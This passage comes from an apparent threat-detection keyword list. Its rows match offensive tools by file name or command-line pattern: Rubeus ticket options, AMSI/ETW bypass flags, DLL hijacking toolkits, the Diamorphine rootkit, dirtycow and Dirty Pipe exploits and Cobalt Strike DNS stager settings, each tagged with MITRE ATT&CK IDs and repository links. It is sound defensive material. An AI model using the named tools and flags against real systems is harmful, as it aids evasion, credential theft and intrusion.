dhcp_dns_update_utils.py*",".{0,1000}\sdhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "* dhcp-discover.nse*",".{0,1000}\sdhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dhcpd-noroute.conf*",".{0,1000}\sdhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* diagrun=true service=DNS* dllpath=*.dll* computername=*",".{0,1000}\sdiagrun\=true\sservice\=DNS.{0,1000}\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* diamond * /certificate:*",".{0,1000}\sdiamond\s.{0,1000}\s\s\/certificate\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamond /tgtdeleg *",".{0,1000}\sdiamond\s\/tgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamond /user:*",".{0,1000}\sdiamond\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* dicom-brute.nse*",".{0,1000}\sdicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dicom-ping.nse*",".{0,1000}\sdicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dict-info.nse*",".{0,1000}\sdict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DigitalOceanProxyTab.java*",".{0,1000}\sDigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "* DInvokeResolver.*",".{0,1000}\sDInvokeResolver\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *",".{0,1000}\s\-\-dirnames\sbank\sfinanc\spayable\spayment\sreconcil\sremit\svoucher\svendor\seft\sswift\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* dirty.c*",".{0,1000}\sdirty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "* dirtycow.c *",".{0,1000}\sdirtycow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* Dirty-Pipe.*",".{0,1000}\sDirty\-Pipe\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "* Dirty-Pipe.sh*",".{0,1000}\sDirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "* --disable-bypass-amsi*",".{0,1000}\s\-\-disable\-bypass\-amsi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-cmdline*",".{0,1000}\s\-\-disable\-bypass\-cmdline.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-etw*",".{0,1000}\s\-\-disable\-bypass\-etw.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* DisableETW(*",".{0,1000}\sDisableETW\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* DisableWLDP(*",".{0,1000}\sDisableWLDP\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* distcc-cve2004-2687.nse*",".{0,1000}\sdistcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DLHell.py*",".{0,1000}\sDLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "* --dll * --only *AmsiScanBuffer*AmsiScanString*",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-only\s.{0,1000}AmsiScanBuffer.{0,1000}AmsiScanString.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --dll * --payload *",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*",".{0,1000}\s\-\-dll\sC\:\\Windows\\System32\\version\.dll.{0,1000}\-\-dll\sC\:\\Windows\\System32\\userenv\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --dll --dllhijack *",".{0,1000}\s\-\-dll\s\-\-dllhijack\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* dllinjection_rs.exe*",".{0,1000}\sdllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -DllName * -FunctionName *",".{0,1000}\s\-DllName\s.{0,1000}\s\-FunctionName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -dns_stager_prepend *",".{0,1000}\s\-dns_stager_prepend\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* -dns_stager_subhost *",".{0,1000}\s\-dns_stager_subhost\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* DNS-Black-CAT Server *",".{0,1000}\sDNS\-Black\-CAT\sServer\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "* dns-blacklist.nse*",".{0,1000}\sdns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-brute.nse*",".{0,1000}\sdns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-cache-snoop.nse*",".{0,1000}\sdns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnscan.py*",".{0,1000}\sdnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "* dns-check-zone.nse*",".{0,1000}\sdns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnschef.exe*",".{0,1000}\sdnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* dnschef.py*",".{0,1000}\sdnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* dns-client-subnet-scan.nse*",".{0,1000}\sdns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnscrypt-proxy*",".{0,1000}\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* --dnsdump *",".{0,1000}\s\-\-dnsdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* dnsdump.py*",".{0,1000}\sdnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "* dns-fuzz.nse*",".{0,1000}\sdns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-ip6-arpa-scan.nse*",".{0,1000}\sdns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnslog-cn.nse*",".{0,1000}\sdnslog\-cn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* dns-nsec3-enum.nse*",".{0,1000}\sdns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-nsec-enum.nse*",".{0,1000}\sdns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-nsid.nse*",".{0,1000}\sdns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-random-srcport.nse*",".{0,1000}\sdns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-random-txid.nse*",".{0,1000}\sdns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-recursion.nse*",".{0,1000}\sdns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-service-discovery.nse*",".{0,1000}\sdns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE 